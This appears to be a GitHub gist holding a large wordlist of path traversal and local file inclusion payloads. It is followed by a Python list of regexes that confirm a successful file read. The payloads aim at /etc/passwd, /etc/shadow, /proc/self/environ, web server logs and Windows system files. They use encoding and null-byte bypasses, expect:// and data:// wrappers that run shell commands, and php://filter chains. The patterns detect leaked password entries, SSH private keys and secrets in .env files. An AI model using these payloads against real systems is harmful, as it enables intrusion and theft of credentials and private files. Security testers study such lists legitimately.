
@ratnadip1998
Created January 28, 2026 13:35
etc/passwd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
etc/shadow
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../../../../../etc/shadow
../../../../../../../etc/shadow
../../../../../../../../etc/shadow
../../../../../../../../../etc/shadow
../../../../../../../../../../etc/shadow
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../../../etc/shadow
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..../..../..../etc/passwd
..../..../..../..../etc/passwd
....\....\....\windows\win.ini
....\....\....\....\windows\win.ini
/etc/passwd%00
/etc/passwd%00.jpg
../../../etc/passwd%00
../../../etc/passwd%00.jpg
....//....//....//etc/passwd%00
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%e0%80%af..%e0%80%afetc/passwd
..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd
..%c1%9c..%c1%9cetc/passwd
..%c0%ae..%c0%ae..%c0%ae/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255cwindows%255cwin.ini
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%25252f..%25252f..%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
../proc/self/environ
../../proc/self/environ
../../../proc/self/environ
../../../../proc/self/environ
../../../../../proc/self/environ
../../../../../../proc/self/environ
../../../../../../../proc/self/environ
../../../../../../../../proc/self/environ
../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/environ
../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../proc/self/environ
proc/self/environ%00
/proc/self/environ%00
../proc/self/environ%00
../../proc/self/environ%00
../../../proc/self/environ%00
../../../../proc/self/environ%00
../../../../../proc/self/environ%00
../../../../../../proc/self/environ%00
../../../../../../../proc/self/environ%00
../../../../../../../../proc/self/environ%00
../../../../../../../../../proc/self/environ%00
../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../../proc/self/environ%00
../etc/passwd%00
../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../etc/group
../../etc/group
../../../etc/group
../../../../etc/group
../../../../../etc/group
../../../../../../etc/group
../../../../../../../etc/group
../../../../../../../../etc/group
../../../../../../../../../etc/group
../../../../../../../../../../etc/group
../../../../../../../../../../../etc/group
../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00
../../../../../../../../../../../../../../../apache/logs/access.log%00
../../../../../../../../../../../../../../../apache/logs/error.log%00
../../../../../../../../../../../../../../../apache2/logs/error.log%00
../../../../../../../../../../../../../../../apache2/logs/access.log%00
../../../../../../../../../../../../../../../var/www/logs/access_log%00
../../../../../../../../../../../../../../../var/www/logs/access.log%00
../../../../../../../../../../../../../../../var/log/apache/access_log%00
../../../../../../../../../../../../../../../var/log/apache2/access_log%00
../../../../../../../../../../../../../../../var/log/apache/access.log%00
../../../../../../../../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../../../../../../../../var/www/logs/error_log%00
../../../../../../../../../../../../../../../var/www/logs/error.log%00
../../../../../../../../../../../../../../../var/log/access_log%00
../../../../../../../../../../../../../../../var/log/access.log%00
../../../../../../../../../../../../../../../var/log/apache/error_log%00
../../../../../../../../../../../../../../../var/log/apache2/error_log%00
../../../../../../../../../../../../../../../var/log/apache/error.log%00
../../../../../../../../../../../../../../../var/log/apache2/error.log%00
../../../../../../../../../../../../../../../var/log/error_log%00
../../../../../../../../../../../../../../../var/log/error.log%00
../../../../../../../../../../../../../../../var/log/httpd/access_log%00
../../../../../../../../../../../../../../../var/log/httpd/error_log%00
../../../../../../../../../../../../../../../var/log/httpd/access.log%00
../../../../../../../../../../../../../../../var/log/httpd/error.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/access_log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/error_log%00
../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/access.log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/error.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../../../../apache/logs/error.log
../../../../../../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../../../../../../apache2/logs/access.log
../../../../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../../../../var/log/access.log
../../../../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../../../../../../../../var/log/error.log
../../../../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../../../../../../opt/XAMPP/logs/access_log
../../../../../../../../../../../../../../../opt/XAMPP/logs/error_log
../../../../../../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../../../../../../opt/XAMPP/logs/access.log
../../../../../../../../../../../../../../../opt/XAMPP/logs/error.log
/var/log/httpd-access.log
../var/log/httpd-access.log
../../var/log/httpd-access.log
../../../var/log/httpd-access.log
../../../../var/log/httpd-access.log
../../../../../var/log/httpd-access.log
../../../../../../var/log/httpd-access.log
../../../../../../../var/log/httpd-access.log
../../../../../../../../var/log/httpd-access.log
../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../../var/log/httpd-access.log
/var/log/httpd-access.log%00
../var/log/httpd-access.log%00
../../var/log/httpd-access.log%00
../../../var/log/httpd-access.log%00
../../../../var/log/httpd-access.log%00
../../../../../var/log/httpd-access.log%00
../../../../../../var/log/httpd-access.log%00
../../../../../../../var/log/httpd-access.log%00
../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
proc/self/environ
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
../logs/access_log
../logs/error_log
/var/cpanel/cpanel.config/apache/logs/access.log
/apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../apache/logs/access.log
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
C:\boot.ini
C:/boot.ini
C:\WAMP\logs\access.log
C:/XAMPP/logs/access.log
C:/WAMP/logs/access.log
C:\XAMPP\logs\access.log
D:\boot.ini
D:/boot.ini
D:\WAMP\logs\access.log
D:/XAMPP/logs/access.log
D:/WAMP/logs/access.log
D:\XAMPP\logs\access.log
web.config
..../..../..../..../..../etc/passwd
.././.././.././etc/passwd
.././.././.././.././etc/passwd
.\.\.\.\.\.windows\win.ini
.\.\.\.\.\.\.windows\win.ini
/./etc/./passwd
/././etc/././passwd
/./././etc/./././passwd
...//...//.../etc/passwd
...///...///...///etc/passwd
..//..//..//etc/passwd
..\\..\\..\\windows\\win.ini
..\\\\..\\\\..\\\\windows\\\\win.ini
..%5c%5c..%5c%5c..%5c%5cwindows%5c%5cwin.ini
..\/..\/..\/etc/passwd
..\/..\/..\/../etc/passwd
../\../\../\etc/passwd
/etc/passwd%00.php
/etc/passwd%00.txt
../../../etc/passwd%00.php
/etc/passwd%2500
/etc/passwd%2500.jpg
../../../etc/passwd%2500
/etc/passwd%00%00
../../../etc/passwd%00%00.jpg
/etc/passwd\x00
../../../etc/passwd\x00.jpg
/etc/passwd%u0000
../../../etc/passwd%u0000.jpg
..\..\..\..\WiNdOwS\wIn.InI
../../../ETC/PASSWD
../../../Etc/Passwd
..%u2216..%u2216etc%u2216passwd
..%u2215..%u2215etc%u2215passwd
..%uFF0F..%uFF0F..%uFF0Fetc%uFF0Fpasswd
../|../|../|etc/passwd
..;<..;<..;<etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%5C..%5C..%5Cwindows%5Cwin.ini
..%2f..%2F../etc/passwd
..%5c..%5C..\windows\win.ini
..%2f../..%2fetc/passwd
/e/**/tc/p/**/asswd
/e<!-- -->tc/p<!-- -->asswd
/e<>tc/p<>asswd
/etc/ passwd
/etc/ passwd
/ etc / passwd
../../../ etc/ passwd
/etc/ passwd
../../../ etc/ passwd
/etc/%0apasswd
../../../etc/%0apasswd
/etc/%0dpasswd
../../../etc/%0dpasswd
%c0%aeetc%c0%afpasswd
%c0%ae%c0%ae/etc/passwd
%u002e%u002e%u002fetc%u002fpasswd
%u002e%u002e%u005cwindows%u005cwin.ini
file:///etc/passwd
file://C:/windows/win.ini
expect://cat /etc/passwd
expect://cat%20/etc/passwd
ogg:///etc/passwd
data://text/plain,<?php system('cat /etc/passwd'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTsgPz4=
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
compress.zlib://../../../../../../etc/passwd
compress.zlib://php://filter/convert.base64-encode/resource=/etc/passwd
compress.bzip2://../../../../../../etc/passwd
compress.bzip2://php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd
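# ==========================================================
# LFI / Path Traversal detection patterns
# ==========================================================
# Regular-expression sources (raw strings) that indicate file content or
# include-related error text in a response. The code that consumes this list
# is not shown here; every entry is written so that re.compile() accepts it.
#
# NOTE(review): the name says "confirmed", but several entries below
# (`localhost`, the bare IPv4 regex, `DB_`, `API_`, `KEY=`, `User-Agent:`,
# `File not found`, `No such file or directory`, ...) also occur in ordinary
# pages and error responses. A hit on one of those alone is not evidence of
# file disclosure; pair it with a high-confidence entry or compare against a
# baseline response before reporting a finding.
LFI_CONFIRMED_PATTERNS = [
    # --- /etc/passwd content ---
    r"root:x:0:0:",
    r"daemon:x:\d+:\d+:",
    r"/bin/(bash|sh)",
    r"bin:x:2:2:",
    r"sys:x:3:3:",
    r"nobody:x:65534:65534:",
    r"\/sbin\/nologin",
    # --- PHP source disclosure ---
    r"<\?php",  # literal "<?php" (the "?" must be escaped)
    r"phpinfo\(\)",
    r"PD9waHA=",  # base64 of "<?php"
    r"echo.*\$",
    # --- Config values ---
    r"DB_HOST",
    r"DB_NAME",
    r"DB_USER",
    r"DB_PASSWORD",
    r"SECRET_KEY",
    r"API_KEY",
    # --- /etc/shadow content ---
    # "$" is escaped so it matches the literal "$" that starts a hash field
    # instead of acting as the end-of-string anchor.
    r"root:\$",
    r"bin:\$",
    # --- /etc/hosts content ---
    r"127\.0\.0\.1",  # dots escaped so only the literal address matches
    r"localhost",
    r"/home/[^:]+:",  # home dirs in passwd
    r"nobody:x:\d+:\d+",
    r"syslog:x:\d+:\d+",
    # --- /proc/version content ---
    r"Linux version",
    r"gcc version",
    # --- PHP errors ---
    r"failed to open stream",
    r"No such file or directory",
    r"File not found",
    r"Warning: include",
    r"Warning: require",
    r"Warning: fopen",
    # --- Configuration file indicators ---
    r"DocumentRoot",
    r"ServerRoot",
    r"define\('",  # "(" escaped; an unescaped "(" does not compile
    r"\$db_host",  # "$" escaped so the PHP variable name is matched literally
    r"\$db_user",
    # --- SSH keys ---
    r"BEGIN RSA PRIVATE KEY",
    r"BEGIN OPENSSH PRIVATE KEY",
    r"ssh-rsa",
    # --- Web server log lines ---
    r"GET \/",
    r"POST \/",
    r"HTTP\/1\.[01]",
    r"\[error\]",
    r"\[warn\]",
    r"\[notice\]",
    r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",  # IP address (listed once)
    # --- .env files ---
    r"APP_ENV=",
    r"DB_",
    r"REDIS_",
    r"AWS_",
    r"API_",
    r"SECRET_",
    r"KEY=",
    r"\[files\]",
    r"\[Mail\]",
    r"PD9waHA",  # base64 prefix of "<?php"
    r"/usr/sbin/nologin",
    # --- win.ini and other Windows content ---
    r"\[fonts\]",
    r"\[extensions\]",
    r"for 16-bit app support",
    r"\[drivers\]",
    r"\[mci extensions\]",
    r"Windows Registry Editor",
    r"C:\\Windows\\System32",
    # --- Java / Tomcat properties ---
    r"java\.version",
    r"java\.home",
    r"java\.class\.path",
    r"sun\.boot\.library\.path",
    r"org\.apache\.catalina",
    r"CATALINA_HOME",
    r"CATALINA_BASE",
    # --- PHP settings ---
    r"allow_url_include",
    r"disable_functions",
    r"open_basedir",
    r"upload_tmp_dir",
    r"DOCUMENT_ROOT",
    r"php_version",
    # --- HTTP request lines and headers (log content) ---
    r"GET / HTTP/1\.[01]",
    r"POST / HTTP/1\.[01]",
    r"User-Agent:",
    r"Referer:",
    # --- web.xml ---
    r"<web-app",
    r"WEB-INF",
    r"META-INF",
    # --- /proc/self/environ ---
    r"HTTP_USER_AGENT=",
    r"HTTP_ACCEPT=",
]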